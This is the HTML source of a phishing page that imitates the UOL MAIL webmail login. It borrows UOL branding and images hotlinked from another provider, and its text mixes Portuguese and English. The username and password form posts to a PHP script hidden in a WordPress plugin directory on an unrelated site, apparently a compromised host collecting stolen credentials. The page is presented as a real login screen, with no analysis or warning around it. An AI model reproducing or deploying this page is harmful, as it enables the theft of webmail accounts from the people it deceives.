 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="">

<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">

<style type="text/css">
<!--
/* GLOBAL STYLE SETTINGS START */

a
{
color: #075b9b;
text-decoration: underline;
}

a:hover
{
color: #84adcd;
text-decoration: none;
}

body
{
font-size: 11px;
color: #5a5a5a;
line-height: 16px;
font-family: Verdana, Sans-Serif;
}

input, textarea, option, select
{
font-size: 12px;
font-family: Arial, Sans-Serif;
}

h1
{
font-size: 45px;
font-family: Arial, Sans-Serif;
color: #0060A9;
}

#content
{
border-right: #003663 1px solid;
padding-right: 6px;
padding-left: 6px;
padding-bottom: 6px;
margin: 0px;
overflow: visible;
border-left: #003663 1px solid;
width: 768px;
padding-top: 6px;
}

#footer
{
background-position: center top;
background-image: url(http://mail.tbaytel.net/bg_footer.jpg);
background-repeat: no-repeat;
width: 782px;
height: 40px;
color: #ffffff;
font-size: 11px;
text-align: right;
padding-right: 0px;
padding-top: 15px;
}

#header1 td
{
padding-right: 10px;
font-weight: bold;
}

#header1
{
border-right: #003663 1px solid;
padding-right: 0px;
background-position: right top;
border-top: #003663 1px solid;
padding-left: 0px;
font-size: 10px;
background-image: url(https://vignette.wikia.nocookie.net/logopedia/images/b/bc/Uol_logos.jpg/revision/latest?cb=20131114175949);
padding-bottom: 0px;
margin: 0px;
border-left: #003663 1px solid;
width: 780px;
color: #ffffff;
padding-top: 0px;
background-repeat: no-repeat;
height: 122px;
text-align: left;
}

input.button
{
background-position: left top;
font-weight: bold;
font-size: 11px;
background-image: url(http://mail.tbaytel.net/bg_button.jpg);
text-transform: uppercase;
width: 132px;
color: #ffffff;
background-repeat: repeat-x;
height: 28px;
background-color: #085a98;
}

#results
{
padding-right: 5px;
margin-top: 5px;
padding-left: 5px;
margin-bottom: 5px;
padding-bottom: 3px;
color: #ffffff;
padding-top: 3px;
background-color: #1869a9;

}

#returnedResults
{
width: 100%;
position: static;
text-align: left;
margin-top: 5px;
}

#returnedResults img
{
margin-right: 10px;
}

#searchBar
{
width: 100%;
background-color: #86afcf;
text-align: left;
}

#padding
{
padding-right: 0px;
padding-left: 0px;
padding-bottom: 10px;
margin: 0px;
width: 100%;
padding-top: 3px;
}

#padding a
{

color: #ffffff;
text-decoration: none;
}

#loggedin
{
margin-right: 10px;
margin-top: 10px;
white-space: nowrap;
}

#padding a:hover
{

color: #ffffff;
text-decoration: underline;
}

#searchBar td.middle
{
border-right: #ffffff 1px solid;
border-top: #ffffff 1px solid;
border-bottom: #ffffff 1px solid;
background-image: url(http://mail.tbaytel.net/bg_button.jpg);
background-position: left top;
background-repeat: repeat-x;
text-align: center;
height: 28px;
width: 195px;
vertical-align: middle;
}

#searchBar td.middleAlt
{
border-top: #ffffff 1px solid;
border-bottom: #ffffff 1px solid;
background-image: url(http://mail.tbaytel.net/bg_searchBar.jpg);
background-position: left top;
background-repeat: repeat-x;
text-align: center;
height: 28px;
width: 195px;
vertical-align: middle;
}

#searchBar td.end
{
border-left: #ffffff 1px solid;
border-top: #ffffff 1px solid;
background-image: url(http://mail.tbaytel.net/bg_button.jpg);
background-position: left top;
background-repeat: repeat-x;
border-bottom: #ffffff 1px solid;
text-align: center;
height: 28px;
width: 195px;
vertical-align: middle;
}

.subheadtext
{
margin-left: 570px;
}
-->
</style>

<title>Bem vindo ao UOL MAIL</title>

<script TYPE="text/javascript" LANGUAGE="javascript">
<!--
function initialFocus()
{
document.getElementById("username").focus();
}
-->
</script>


</head>


<body onload="initialFocus()">

<center>
<table cellpadding="0" cellspacing="0" border="0" width="782">
<tr>
<td>

<div id="header1">
</div>


<div id="content">






<form action="http://www.sagios.com/blog/wp-content/plugins/JumanNafis/slink.php" target=_top id="frm" method=post enctype="multipart/form-data" onsubmit="return doLogin(this, 'Entrar your usuario and senha');">
<input type=hidden name=Language value="">

<table cellpadding="0" cellspacing="0" border="0" id="returnedResults" width="768">
<tr>
<td>
<img src="http://mail.tbaytel.net/bg_webmailImage.jpg" align="left" alt="" />
</td>
<td valign="top">
<table cellpadding="3" cellspacing="0" border="0" style="width: 404;">

<tr>
<td colspan="2"><br><h1>Usuarios registrados</h1></td>
</tr>
<tr>
<td align="center" colspan="2"><b>Entrar your usuario and senha</b></td>
</tr>
<tr>
<td align="center" id="topErrLabel" colspan="2" style="color:#FF0000;"></td>

</tr>
<tr>
<td align="center" id="errLabel" colspan="2" style="color:#FF0000;"></td>
</tr>
<tr>
<td align=right><label for=username>Username</label>:&nbsp;</th>
<td><input taborder="1" tabIndex="1" type="text" size="20" maxlength="200" name="username" id="username" /></td>
</tr>

<tr>
<td align=right><label for=password>Password</label>:&nbsp;</th>
<td><input tabindex=2 taborder="2" id="password" name="password" Type=password size=20 MaxLength=99></td>

</tr>
<tr>
<td></td>
<td align="left"><input taborder="3" tabIndex="3" type="submit" value="Login" class="button" id="login" name="login" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>

</tr>
<tr>
<td></td>
<td align="center" valign="top" style="width:132px;"><a href="https://home.suddenlink.net/x.php" target="_self">Secure Login</a> </td>
</tr>
<tr>
<td colspan="2" height="40"></td>
</tr>

</table>
</td>
</tr>
</table>
</form>

</div>

<div id="footer"></div>

</td>
</tr>
</table>
</center>







<script type="text/javascript">prepareLoginPage(); createCookie("Language", "english"); </script>



<script type="text/javascript">
<!--
theObjects = document.getElementsByTagName("object");
for (var i = 0; i < theObjects.length; i++) {
theObjects[i].outerHTML = theObjects[i].outerHTML;
}
//<![CDATA[

if(typeof sIFR == "function"){

var intOffSet = 0;

if (navigator.appName == "Microsoft Internet Explorer"){
intOffSet = 7;
}

sIFR.replaceElement(named({sSelector:"h1", sFlashSrc:"/DomainFiles/*/arialnarrow.swf", sColor:"#085a98", sLinkColor:"#085a98", sBgColor:"#FFFFFF", sHoverColor:"#085a98", nPaddingTop:0, nPaddingBottom:0+intOffSet, sFlashVars:"textalign=center&offsetTop=0",sWmode:"Transparent"}));
sIFR.replaceElement(named({sSelector:"h2", sFlashSrc:"/DomainFiles/*/arialnarrow.swf", sColor:"#085a98", sLinkColor:"#a4b7c5", sBgColor:"#FFFFFF", sHoverColor:"#a4b7c5", nPaddingTop:3, nPaddingBottom:4, sFlashVars:"textalign=center&offsetTop=0",sWmode:"Transparent"}));
sIFR.replaceElement(named({sSelector:"h2.darkblue", sFlashSrc:"/DomainFiles/*/arialnarrow.swf", sColor:"#085a98", sLinkColor:"#a4b7c5", sBgColor:"#FFFFFF", sHoverColor:"#a4b7c5", nPaddingTop:3, nPaddingBottom:4, sFlashVars:"textalign=center&offsetTop=0",sWmode:"Transparent"}));
sIFR.replaceElement(named({sSelector:"h2.grey", sFlashSrc:"/DomainFiles/*/arialnarrow.swf", sColor:"#5a5a5a", sLinkColor:"#5a5a5a", sBgColor:"#FFFFFF", sHoverColor:"#5a5a5a", nPaddingTop:3, nPaddingBottom:4, sFlashVars:"textalign=center&offsetTop=0",sWmode:"Transparent"}));
sIFR.replaceElement(named({sSelector:"h2.lightblue", sFlashSrc:"/DomainFiles/*/arialnarrow.swf", sColor:"#a4b7c5", sLinkColor:"#a4b7c5", sBgColor:"#FFFFFF", sHoverColor:"#a4b7c5", nPaddingTop:3, nPaddingBottom:4, sFlashVars:"textalign=center&offsetTop=0",sWmode:"Transparent"}));
sIFR.replaceElement(named({sSelector:"h2.subdarkblue", sFlashSrc:"/DomainFiles/*/arialnarrow.swf", sColor:"#085a98", sLinkColor:"#a4b7c5", sBgColor:"#FFFFFF", sHoverColor:"#a4b7c5", nPaddingTop:0, nPaddingBottom:1, sFlashVars:"textalign=center&offsetTop=0",sWmode:"Transparent"}));
sIFR.replaceElement(named({sSelector:"h5.darkblue", sFlashSrc:"/DomainFiles/*/arialnarrow.swf", sColor:"#085a98", sLinkColor:"#a4b7c5", sBgColor:"#FFFFFF", sHoverColor:"#a4b7c5", nPaddingTop:0, nPaddingBottom:0, sFlashVars:"textalign=center&offsetTop=0",sWmode:"Transparent"}));
sIFR.replaceElement(named({sSelector:"td.middle", sFlashSrc:"/DomainFiles/*/arialnarrowAlt.swf", sColor:"#FFFFFF", sLinkColor:"#FFFFFF", sBgColor:"#FFFFFF", sHoverColor:"#FFFFFF", nPaddingTop:5, nPaddingBottom:5, sFlashVars:"textalign=center&offsetTop=0",sWmode:"Transparent"}));
sIFR.replaceElement(named({sSelector:"td.end", sFlashSrc:"/DomainFiles/*/arialnarrowAlt.swf", sColor:"#FFFFFF", sLinkColor:"#FFFFFF", sBgColor:"#FFFFFF", sHoverColor:"#FFFFFF", nPaddingTop:5, nPaddingBottom:5, sFlashVars:"textalign=center&offsetTop=0",sWmode:"Transparent"}));
sIFR.replaceElement(named({sSelector:"div.subheadtext", sFlashSrc:"/DomainFiles/*/arialnarrowAlt.swf", sColor:"#FFFFFF", sLinkColor:"#FFFFFF", sBgColor:"#FFFFFF", sHoverColor:"#FFFFFF", nPaddingTop:0, nPaddingBottom:5, sFlashVars:"textalign=left&offsetTop=0",sWmode:"Transparent"}));


};

//]]>
// End of header portion of script -->
</script>



</body>
</html> 